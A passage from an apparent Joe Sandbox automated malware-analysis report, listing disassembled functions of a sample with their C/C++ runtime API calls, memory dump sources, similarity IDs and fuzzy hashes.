                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7311C472A041249BCB04EBA5DC46AEE7B74EF84358F10457FF911B72D1DB38AA01C7A9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004033EA Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004033EF
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 00403415
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 0040341E
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040344F
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040348B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1202896665-0
                                                                                                                                                                                                                                  • Opcode ID: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
                                                                                                                                                                                                                                  • Instruction ID: b08fc69a2d58a520d61ed45628bf7838f6025f71e81aad9ede0327bacf9a49bc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F11B2329002249BCB05EFA4C845AEE7B74EF84319F10457EF811772D1DB789A00CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004035F5 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 00403620
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040365A
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00403696
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1202896665-0
                                                                                                                                                                                                                                  • Opcode ID: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
                                                                                                                                                                                                                                  • Instruction ID: 35ba7fbacb3ba011adbce412d2c2d1e287e189574cae76d7885ddda8e317074f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F11C432A001289BCB14EFA5C845AEE7B74AF84319F10457FF811773D1DB389A04CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CF69A6 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,05CF6BF7,00000001,00000001,?), ref: 05CF6A00
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,05CF6BF7,00000001,00000001,?,?,?,?), ref: 05CF6A86
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 05CF6B80
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 05CF6B8D
                                                                                                                                                                                                                                    • Part of subcall function 05CF7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05CF7CDE
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 05CF6B96
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 05CF6BBB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1414292761-0
                                                                                                                                                                                                                                  • Opcode ID: 5aa362d34f2587ad585337770af062121dfa53fa41768fff83d20bcf48d2f1bc
                                                                                                                                                                                                                                  • Instruction ID: cffba6330ba24374cdeeb6899e5ebae6aec4285678cb07a6542ace62140b7604
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5aa362d34f2587ad585337770af062121dfa53fa41768fff83d20bcf48d2f1bc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A951D172700216ABDB658F60CC85EBB77AAEF44750B154A28FE06DB140DB74ED80E7A0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00411A77 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __cftoe
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4189289331-0
                                                                                                                                                                                                                                  • Opcode ID: d20e9699dbc1971cb5a568552f769a18d013c3a1758ac9be0fb612f4fcf7e9e2
                                                                                                                                                                                                                                  • Instruction ID: 718bfb1be64fddbb13d287cf5bb67825c1c0e481ba6d94f2ea4f00e94f797b17
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d20e9699dbc1971cb5a568552f769a18d013c3a1758ac9be0fb612f4fcf7e9e2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5851FB32504205ABDF249B598C41EEF77A9AF49364F10421FF915962A1FB3DE9C0C66C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CF1CDE Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __cftoe
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4189289331-0
                                                                                                                                                                                                                                  • Opcode ID: 2ddc8343f9251e146c752777cf7602817e468c0d1f081b9786246e2890976293
                                                                                                                                                                                                                                  • Instruction ID: 8b1b414adfa1cdeffa478bbc86eaf2eceb2a752af8a00dcaca6802dc13f82917
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ddc8343f9251e146c752777cf7602817e468c0d1f081b9786246e2890976293
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA514932A04605FBDFA59B69CC88EBE77B9FF49320F180A19EA1596281DB35D600D760
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040C9B5 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0040C9AC,0040A25B), ref: 0040C9C3
                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D1
                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9EA
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,0040C9AC,0040A25B), ref: 0040CA3C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                  • Opcode ID: 9ec8e2a5af9cecc2b331547669bdca73f67e442984506367ed98352285f45261
                                                                                                                                                                                                                                  • Instruction ID: 4d2dab335d40ef71c1f126db0958835d547db160ba3e5df8986dc94b5f1501a5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ec8e2a5af9cecc2b331547669bdca73f67e442984506367ed98352285f45261
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5001C072609619AEE63857B5BCC5B2B3665DB01378720033FF220B02F1EF694C06558C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CECC1C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,05CECC13,05CEA4C2), ref: 05CECC2A
                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 05CECC38
                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 05CECC51
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,05CECC13,05CEA4C2), ref: 05CECCA3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                  • Opcode ID: 0582111726bc4582c636df92e8fe045c6ff17bb16724062b7f54ac71f9743851
                                                                                                                                                                                                                                  • Instruction ID: 0231809b779f5e7754000b44290595f67ae671078828ba9ae63deae212aac0b3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0582111726bc4582c636df92e8fe045c6ff17bb16724062b7f54ac71f9743851
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0301843230A7255EA6292775BD8CA6B3B65EB01A747202E3DE736A50F0EF614C016688
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00416D19 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                                  • Opcode ID: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                  • Instruction ID: ed1cfbe94671cc1e241a5e305b234748cf7dab698c9013e935629a888f8688e1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CF0A431784B1066C6227B36BC0AFDF26299FC1765B27062FF518A2291EF2CD882815D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CF6F80 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                                  • Opcode ID: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                  • Instruction ID: da109318c6c7a236c470b0a6ec28e5a116dfd8818924153c7ecf91788f30cf2d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FF0A4397486127AC6A223797C0CF6F2566EBC17A1F650E24F715E2290EE2489825365
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00417253 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042E2F0,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042E2F0,FlsSetValue,00000000), ref: 0041729F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                  • String ID: -@
                                                                                                                                                                                                                                  • API String ID: 3177248105-2564449678
                                                                                                                                                                                                                                  • Opcode ID: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                  • Instruction ID: 8997a9a2b537593604dca6541f5acb5d3abab1905c8fb23eed40c845f27096e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED01473634A2239BC7314B68AC44A9B3BA8BF117607114675F90AE3240DB34D843C6EC
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040187F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                  • std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                  • API String ID: 1589814233-1866435925
                                                                                                                                                                                                                                  • Opcode ID: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                  • Instruction ID: 07e54f61a89a03d5a6d9a7cf2ef478e5e050e13e4079476904521aa99984b06a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78F0C26290035C63DB10B9659C42FEA7B989F09358F24C03BFD45761E1D77D5A04C6ED
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00413A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002), ref: 00413A8C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                  • Opcode ID: aee02ad5ca534fb28cb66d43b3f01b7085f8b2a17258c2e684143968d834cc31
                                                                                                                                                                                                                                  • Instruction ID: a34188c843a8f46fdd92a2bf3fbb0ddbd7449eedd0cf1b17e067f3e400b11719
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aee02ad5ca534fb28cb66d43b3f01b7085f8b2a17258c2e684143968d834cc31
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2CF0A930B01218BBDB109F50DC05B9E7F78EF44752F404069F809A2290DF344E45C79C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041AA79 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                  • Instruction ID: 9cd28828fb54a95b18f1d3d04b552151bab261da8883c7926ca586bf812e9daa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA71B1359022569BCB218B59C884AFFBB75EF41350F14422BE914A7380E7789CE1C7EA
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CFACE0 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                  • Instruction ID: fff938abde276f3a4dd0a1117ac686cc2847eb142098f1199130bb28231f7e0b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0971C479A15217AFCB61CF55CC84ABFFB76FF41350F244929E61A6B280D7708A41C7A0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004145CC Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004146D7
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004146EE
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041470D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414728
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041473F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3033488037-0
                                                                                                                                                                                                                                  • Opcode ID: 088220e492716788e8e6bec049d5caff652ce20ed0a84fe148ba2189e9e303d7
                                                                                                                                                                                                                                  • Instruction ID: c2206efc5f66e5100cf0e8c7e25606760de7fe79bb98949094d9bf3f90d27d39
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 088220e492716788e8e6bec049d5caff652ce20ed0a84fe148ba2189e9e303d7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B51D471A00304AFDB20DF65D881BAA77F4EF99728F15056EE809D7690E739E981CB48
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00415063 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
